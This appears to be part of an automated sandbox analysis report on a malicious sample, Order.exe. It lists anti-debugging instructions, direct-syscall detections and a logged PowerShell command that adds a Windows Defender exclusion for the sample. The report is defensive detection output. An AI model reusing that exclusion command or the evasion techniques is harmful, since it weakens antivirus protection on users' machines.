                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195260B mov eax, dword ptr fs:[00000030h]5_2_0195260B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195260B mov eax, dword ptr fs:[00000030h]5_2_0195260B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195260B mov eax, dword ptr fs:[00000030h]5_2_0195260B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195260B mov eax, dword ptr fs:[00000030h]5_2_0195260B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195260B mov eax, dword ptr fs:[00000030h]5_2_0195260B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195260B mov eax, dword ptr fs:[00000030h]5_2_0195260B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195260B mov eax, dword ptr fs:[00000030h]5_2_0195260B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195E627 mov eax, dword ptr fs:[00000030h]5_2_0195E627
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01976620 mov eax, dword ptr fs:[00000030h]5_2_01976620
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01978620 mov eax, dword ptr fs:[00000030h]5_2_01978620
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194262C mov eax, dword ptr fs:[00000030h]5_2_0194262C
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0866E mov eax, dword ptr fs:[00000030h]5_2_01A0866E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0866E mov eax, dword ptr fs:[00000030h]5_2_01A0866E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195C640 mov eax, dword ptr fs:[00000030h]5_2_0195C640
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01972674 mov eax, dword ptr fs:[00000030h]5_2_01972674
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197A660 mov eax, dword ptr fs:[00000030h]5_2_0197A660
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197A660 mov eax, dword ptr fs:[00000030h]5_2_0197A660
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C89B3 mov esi, dword ptr fs:[00000030h]5_2_019C89B3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C89B3 mov eax, dword ptr fs:[00000030h]5_2_019C89B3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C89B3 mov eax, dword ptr fs:[00000030h]5_2_019C89B3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019409AD mov eax, dword ptr fs:[00000030h]5_2_019409AD
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019409AD mov eax, dword ptr fs:[00000030h]5_2_019409AD
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A9D0 mov eax, dword ptr fs:[00000030h]5_2_0194A9D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A9D0 mov eax, dword ptr fs:[00000030h]5_2_0194A9D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A9D0 mov eax, dword ptr fs:[00000030h]5_2_0194A9D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A9D0 mov eax, dword ptr fs:[00000030h]5_2_0194A9D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A9D0 mov eax, dword ptr fs:[00000030h]5_2_0194A9D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A9D0 mov eax, dword ptr fs:[00000030h]5_2_0194A9D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019749D0 mov eax, dword ptr fs:[00000030h]5_2_019749D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D69C0 mov eax, dword ptr fs:[00000030h]5_2_019D69C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019729F9 mov eax, dword ptr fs:[00000030h]5_2_019729F9
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019729F9 mov eax, dword ptr fs:[00000030h]5_2_019729F9
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0A9D3 mov eax, dword ptr fs:[00000030h]5_2_01A0A9D3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019CE9E0 mov eax, dword ptr fs:[00000030h]5_2_019CE9E0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01938918 mov eax, dword ptr fs:[00000030h]5_2_01938918
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01938918 mov eax, dword ptr fs:[00000030h]5_2_01938918
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019CC912 mov eax, dword ptr fs:[00000030h]5_2_019CC912
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BE908 mov eax, dword ptr fs:[00000030h]5_2_019BE908
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BE908 mov eax, dword ptr fs:[00000030h]5_2_019BE908
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C892A mov eax, dword ptr fs:[00000030h]5_2_019C892A
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D892B mov eax, dword ptr fs:[00000030h]5_2_019D892B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C0946 mov eax, dword ptr fs:[00000030h]5_2_019C0946
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019CC97C mov eax, dword ptr fs:[00000030h]5_2_019CC97C
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A14940 mov eax, dword ptr fs:[00000030h]5_2_01A14940
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E4978 mov eax, dword ptr fs:[00000030h]5_2_019E4978
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E4978 mov eax, dword ptr fs:[00000030h]5_2_019E4978
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01966962 mov eax, dword ptr fs:[00000030h]5_2_01966962
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01966962 mov eax, dword ptr fs:[00000030h]5_2_01966962
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01966962 mov eax, dword ptr fs:[00000030h]5_2_01966962
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0198096E mov eax, dword ptr fs:[00000030h]5_2_0198096E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0198096E mov edx, dword ptr fs:[00000030h]5_2_0198096E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0198096E mov eax, dword ptr fs:[00000030h]5_2_0198096E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019CC89D mov eax, dword ptr fs:[00000030h]5_2_019CC89D
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01940887 mov eax, dword ptr fs:[00000030h]5_2_01940887
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0A8E4 mov eax, dword ptr fs:[00000030h]5_2_01A0A8E4
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196E8C0 mov eax, dword ptr fs:[00000030h]5_2_0196E8C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A108C0 mov eax, dword ptr fs:[00000030h]5_2_01A108C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197C8F9 mov eax, dword ptr fs:[00000030h]5_2_0197C8F9
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197C8F9 mov eax, dword ptr fs:[00000030h]5_2_0197C8F9
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019CC810 mov eax, dword ptr fs:[00000030h]5_2_019CC810
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01962835 mov eax, dword ptr fs:[00000030h]5_2_01962835
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01962835 mov eax, dword ptr fs:[00000030h]5_2_01962835
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01962835 mov eax, dword ptr fs:[00000030h]5_2_01962835
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01962835 mov ecx, dword ptr fs:[00000030h]5_2_01962835
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01962835 mov eax, dword ptr fs:[00000030h]5_2_01962835
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01962835 mov eax, dword ptr fs:[00000030h]5_2_01962835
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E483A mov eax, dword ptr fs:[00000030h]5_2_019E483A
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E483A mov eax, dword ptr fs:[00000030h]5_2_019E483A
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197A830 mov eax, dword ptr fs:[00000030h]5_2_0197A830
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01970854 mov eax, dword ptr fs:[00000030h]5_2_01970854
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01944859 mov eax, dword ptr fs:[00000030h]5_2_01944859
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01944859 mov eax, dword ptr fs:[00000030h]5_2_01944859
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01952840 mov ecx, dword ptr fs:[00000030h]5_2_01952840
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D6870 mov eax, dword ptr fs:[00000030h]5_2_019D6870
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D6870 mov eax, dword ptr fs:[00000030h]5_2_019D6870
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019CE872 mov eax, dword ptr fs:[00000030h]5_2_019CE872
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019CE872 mov eax, dword ptr fs:[00000030h]5_2_019CE872
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950BBE mov eax, dword ptr fs:[00000030h]5_2_01950BBE
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950BBE mov eax, dword ptr fs:[00000030h]5_2_01950BBE
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F4BB0 mov eax, dword ptr fs:[00000030h]5_2_019F4BB0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F4BB0 mov eax, dword ptr fs:[00000030h]5_2_019F4BB0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EEBD0 mov eax, dword ptr fs:[00000030h]5_2_019EEBD0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01940BCD mov eax, dword ptr fs:[00000030h]5_2_01940BCD
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01940BCD mov eax, dword ptr fs:[00000030h]5_2_01940BCD
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01940BCD mov eax, dword ptr fs:[00000030h]5_2_01940BCD
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01960BCB mov eax, dword ptr fs:[00000030h]5_2_01960BCB
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01960BCB mov eax, dword ptr fs:[00000030h]5_2_01960BCB
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01960BCB mov eax, dword ptr fs:[00000030h]5_2_01960BCB
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01948BF0 mov eax, dword ptr fs:[00000030h]5_2_01948BF0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01948BF0 mov eax, dword ptr fs:[00000030h]5_2_01948BF0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01948BF0 mov eax, dword ptr fs:[00000030h]5_2_01948BF0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196EBFC mov eax, dword ptr fs:[00000030h]5_2_0196EBFC
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019CCBF0 mov eax, dword ptr fs:[00000030h]5_2_019CCBF0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]5_2_019BEB1D
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]5_2_019BEB1D
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]5_2_019BEB1D
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]5_2_019BEB1D
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]5_2_019BEB1D
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]5_2_019BEB1D
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]5_2_019BEB1D
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]5_2_019BEB1D
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]5_2_019BEB1D
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A08B28 mov eax, dword ptr fs:[00000030h]5_2_01A08B28
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A08B28 mov eax, dword ptr fs:[00000030h]5_2_01A08B28
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A14B00 mov eax, dword ptr fs:[00000030h]5_2_01A14B00
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196EB20 mov eax, dword ptr fs:[00000030h]5_2_0196EB20
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196EB20 mov eax, dword ptr fs:[00000030h]5_2_0196EB20
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01938B50 mov eax, dword ptr fs:[00000030h]5_2_01938B50
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019EEB50 mov eax, dword ptr fs:[00000030h]5_2_019EEB50
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F4B4B mov eax, dword ptr fs:[00000030h]5_2_019F4B4B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F4B4B mov eax, dword ptr fs:[00000030h]5_2_019F4B4B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E8B42 mov eax, dword ptr fs:[00000030h]5_2_019E8B42
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D6B40 mov eax, dword ptr fs:[00000030h]5_2_019D6B40
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D6B40 mov eax, dword ptr fs:[00000030h]5_2_019D6B40
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0AB40 mov eax, dword ptr fs:[00000030h]5_2_01A0AB40
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193CB7E mov eax, dword ptr fs:[00000030h]5_2_0193CB7E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A12B57 mov eax, dword ptr fs:[00000030h]5_2_01A12B57
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A12B57 mov eax, dword ptr fs:[00000030h]5_2_01A12B57
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A12B57 mov eax, dword ptr fs:[00000030h]5_2_01A12B57
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A12B57 mov eax, dword ptr fs:[00000030h]5_2_01A12B57
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01978A90 mov edx, dword ptr fs:[00000030h]5_2_01978A90
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]5_2_0194EA80
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]5_2_0194EA80
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]5_2_0194EA80
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]5_2_0194EA80
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]5_2_0194EA80
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]5_2_0194EA80
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]5_2_0194EA80
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]5_2_0194EA80
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]5_2_0194EA80
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A14A80 mov eax, dword ptr fs:[00000030h]5_2_01A14A80
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01948AA0 mov eax, dword ptr fs:[00000030h]5_2_01948AA0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01948AA0 mov eax, dword ptr fs:[00000030h]5_2_01948AA0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01996AA4 mov eax, dword ptr fs:[00000030h]5_2_01996AA4
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01940AD0 mov eax, dword ptr fs:[00000030h]5_2_01940AD0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01974AD0 mov eax, dword ptr fs:[00000030h]5_2_01974AD0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01974AD0 mov eax, dword ptr fs:[00000030h]5_2_01974AD0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01996ACC mov eax, dword ptr fs:[00000030h]5_2_01996ACC
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01996ACC mov eax, dword ptr fs:[00000030h]5_2_01996ACC
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01996ACC mov eax, dword ptr fs:[00000030h]5_2_01996ACC
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197AAEE mov eax, dword ptr fs:[00000030h]5_2_0197AAEE
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197AAEE mov eax, dword ptr fs:[00000030h]5_2_0197AAEE
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019CCA11 mov eax, dword ptr fs:[00000030h]5_2_019CCA11
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01964A35 mov eax, dword ptr fs:[00000030h]5_2_01964A35
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01964A35 mov eax, dword ptr fs:[00000030h]5_2_01964A35
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197CA24 mov eax, dword ptr fs:[00000030h]5_2_0197CA24
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196EA2E mov eax, dword ptr fs:[00000030h]5_2_0196EA2E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]5_2_01946A50
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]5_2_01946A50
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]5_2_01946A50
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]5_2_01946A50
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]5_2_01946A50
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]5_2_01946A50
                  Source: C:\Users\user\Desktop\Order.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe"
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe"Jump to behavior
                  Found direct / indirect Syscall (likely to bypass EDR)
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtClose: Direct from: 0x76F02B6C
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtUnmapViewOfSection: Direct from: 0x76F02D3CJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
